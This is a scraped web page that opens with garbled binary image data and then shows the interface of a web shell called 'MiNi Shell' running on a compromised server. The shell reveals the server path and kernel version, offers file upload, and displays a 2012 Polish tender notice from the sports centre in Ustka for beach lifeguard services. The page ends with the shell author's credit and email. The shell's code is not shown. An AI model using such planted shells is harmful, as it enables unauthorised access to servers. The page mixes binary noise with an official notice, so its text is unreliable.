JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120508/101137-N-2012.html

<p class="kh_header"><b>Ustka: Organizacja kąpielisk strzeżonych i zapewnienie bezpieczeństwa osób pływających i kąpiących się w obrębie plaży wschodniej i zachodniej w Ustce w okresie sezonu letniego w 2012 roku</b><br>
<b>Numer ogłoszenia: 101137 - 2012; data zamieszczenia: 08.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji w Ustce , ul. Grunwaldzka 35, 76-270 Ustka, woj. pomorskie, tel. 59 8145586, faks 59 8144769.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osir.ustka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład budżetowy jednostki samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja kąpielisk strzeżonych i zapewnienie bezpieczeństwa osób pływających i kąpiących się w obrębie plaży wschodniej i zachodniej w Ustce w okresie sezonu letniego w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest organizacja kąpielisk strzeżonych i zapewnienie bezpieczeństwa osób pływających i kąpiących się w obrębie plaży wschodniej i zachodniej w Ustce w okresie sezonu letniego w 2012 roku, zgodnie z przepisami Rozporządzenie Rady Ministrów z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne (Dz.U. z 1997 r. Nr 57, poz. 358) i innych przepisów właściwych w tym zakresie. 2. Przedmiot zamówienia obejmuje realizację powyższych usług na następujących kąpieliskach: 1) kąpielisko Plaża wschodnia 1 - odcinek 500 mb linii brzegowej po stronie wschodniej falochronu, początek licząc od 250 m od falochronu, w okresie 1 lipca - 31 sierpnia 2012 r. 2) kąpielisko Plaża wschodnia 2 - odcinek 100 mb linii brzegowej po stronie wschodniej falochronu, początek licząc od 250 m od falochronu, w okresach 15 - 30 czerwca i 1 - 15 września 2012 r. 3) kąpielisko Plaża zachodnia - odcinek 100 mb linii brzegowej po stronie zachodniej falochronu, początek licząc od 150 m od falochronu, w okresie 1 lipca - 31 sierpnia 2012 r. 3. W przypadku lokalizacji na plaży miasteczka plażowego lub innej działalności rekreacyjnej dysponującej własną obsługą ratowniczą, Wykonawca obowiązany jest zorganizować kąpielisko strzeżone z pominięciem ww. lokalizacji, natomiast teren pominięty oznaczyć jako niestrzeżony przez miejskie służby ratownicze. 4. Przy organizacji kąpielisk strzeżonych i zapewnieniu bezpieczeństwa osób pływających i kąpiących się w obrębie plaży wschodniej i zachodniej należy w szczególności: 1) sprawdzić miejsca przeznaczone pod kąpielisko pod względem bezpieczeństwa, 2) przygotować miejsca ratownikom w celu zapewnienia stałej obserwacji i kontroli osób kąpiących się, 3) zatrudnić wykwalifikowaną kadrę ratowniczą i starszego sternika motorowodnego zgodnie z właściwymi przepisami, 4) zapewnić poprzez ratowników stałą kontrolę lustra wody z brzegu i od strony wody, 5) zorganizować punkty medyczne na obu kąpieliskach oraz zatrudnić personel do obsługi punktu medycznego na plaży wschodniej i zachodniej, 6) zabezpieczyć ratownicze łodzie wiosłowe na każde stanowisko (na każde 100 m linii brzegowej min. 1 szt.), 7) zabezpieczyć i wyposażyć stanowiska ratownicze oraz punkty medyczne w niezbędny sprzęt ratunkowy i medyczny (w tym w leki i artykuły sanitarne, a także w parasole, parawany i leżaki), natomiast kąpieliska w urządzenia sygnalizacyjne i ostrzegawcze, a także zabezpieczyć ratowników i obsługę punktów medycznych w ubiór zgodny z obowiązującymi normami, 8) utrzymywać sprzęt ratunkowy i medyczny w należytym stanie umożliwiającym jego stałe użytkowanie, a w przypadku jego awarii lub zużycia - uzupełniać brakujący sprzęt, 9) wyraźnie oznaczyć granice kąpielisk, w ramach których oznaczyć strefy dla umiejących pływać oraz dla osób nie umiejących pływać, 10) ustawić maszty wyposażone w komplet flag informacyjnych, 11) zapewnić informację o dopuszczalności lub zakazie kąpieli, 12) zabezpieczyć odpowiednie środki łączności umożliwiające utrzymanie bezpośredniej stałej łączności ze służbami ratowniczymi oraz pokrywać koszty ich utrzymania, 13) zabezpieczyć w ciągłej gotowości dwie łodzie motorowe przekazane przez Zamawiającego nieodpłatnie odrębnymi umowami użyczenia (w tym: pokrywać koszty paliwa, przeprowadzać przeglądy techniczne zgodnie z wymaganiami u autoryzowanych przedstawicieli, przeprowadzać na własny koszt wszelkie naprawy niezbędne do zachowania łodzi motorowych w stanie niepogorszonym, zarejestrować łodzie, ubezpieczyć itp.), 14) umożliwić sponsorowi łodzi tj. Agencji Sport Mega Marketing sp. z o.o. z Poznania sprawdzanie sposobu użytkowania łodzi i ich stanu technicznego, 15) uzyskać ekspertyzy dopuszczające kąpieliska do eksploatacji, 16) wyposażyć co najmniej jedną łódź motorową w sprzęt ABC i aparat tlenowy oraz dodatkowo zatrudnić ratownika wodnego z uprawnieniami płetwonurka, 17) umieścić przy każdym kąpielisku na widocznym miejscu regulamin kąpieliska, 18) zorganizować trzyosobowy zespół szybkiego reagowania obejmujący swym zasięgiem plaże wschodnią i zachodnią, który w momencie zgłoszenia o wypadku natychmiast wypływa łodzią motorową w celu udzielenia pierwszej pomocy poszkodowanym, 19) pokryć koszty związane z przystosowaniem kontenera jako zaplecza socjalnego dla ratowników i innych osób zatrudnionych przez Wykonawcę do obsługi kąpieliska oraz pokryć koszty poniesione w wyniku eksploatacji kontenera i wynikające z zapisów liczników, 20) umożliwiać Zamawiającemu dostęp do energii elektrycznej w kontenerze na potrzeby prowadzonych na plaży imprez lub akcji promocyjnych (koszt energii elektrycznej zużytej w związku z ww. pokryje Zamawiający wg wskazań licznika), 21) zawrzeć umowę ubezpieczenia OC w zakresie związanym z funkcjonowaniem kąpielisk w Ustce oraz ubezpieczyć zatrudnionych ratowników od następstw nieszczęśliwych wypadków. 5. Zamawiający oddaje nieodpłatnie do dyspozycji Wykonawcy na czas trwania zamówienia kontener na utworzenie bazy ratowniczej i medycznej wraz z zapleczem socjalnym dla potrzeb realizacji zamówienia. 6. Na Wykonawcy spoczywa obowiązek zabezpieczenia kontenera przed osobami postronnymi, ciąży odpowiedzialność za utrzymanie w odpowiednim stanie technicznym oraz przeprowadzanie na własny koszt napraw niezbędnych do zachowania ww. kontenera w stanie nie pogorszonym. Kontener zostanie przekazany Wykonawcy protokolarnie przed datą rozpoczęcia działalności, w terminie ustalonym przez Zamawiającego i Wykonawcę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający na podstawie art. 67 ust. 1 pkt. 6 ustawy PZP, przewiduje możliwość udzielenia zamówień uzupełniających polegających na wydłużeniu okresu funkcjonowania kąpielisk strzeżonych w Ustce w 2012 r., a co za tym idzie organizacji kąpielisk i zapewnienia bezpieczeństwa osób pływających, kąpiących się i uprawiających sporty wodne na wskazanych kąpieliskach, bądź też wydłużeniu długości odcinka na którym funkcjonuje kąpielisko</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.25.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca posiada uprawnienia do wykonywania zadań z zakresu bezpieczeństwa osób pływających, kąpiących się i uprawniających sporty wodne, zgodnie z art. 7 ust. 1 Rozporządzenia Rady Ministrów z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kapiących się i uprawiających sporty wodne (Dz. U. z 1997 r. Nr 57, poz. 358); zgodnie z § 7 ust. 1 ww. rozporządzenia do wykonywania zadań w zakresie bezpieczeństwa osób pływających, kąpiących się i uprawniających sporty wodne upoważnione są Wodne Ochotnicze Pogotowie Ratunkowe (WOPR) oraz inne organizacje ratownicze, które wykonują obowiązki i uprawnienia WOPR za zgodę Prezesa Urzędu Kultury Fizycznej i Turystyki</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku działania Wykonawcy przez pełnomocnika, należy dołączyć do oferty pełnomocnictwo w oryginale bądź jego kopię poświadczoną notarialnie, z którego treści będzie wynikać zakres udzielonego umocowania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osir.ustka.pl; www.ustka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji w Ustce, 76-270 Ustka, ul. Grunwaldzka 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2012 godzina 10:00, miejsce: Ośrodek Sportu i Rekreacji w Ustce, 76-270 Ustka, ul. Grunwaldzka 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com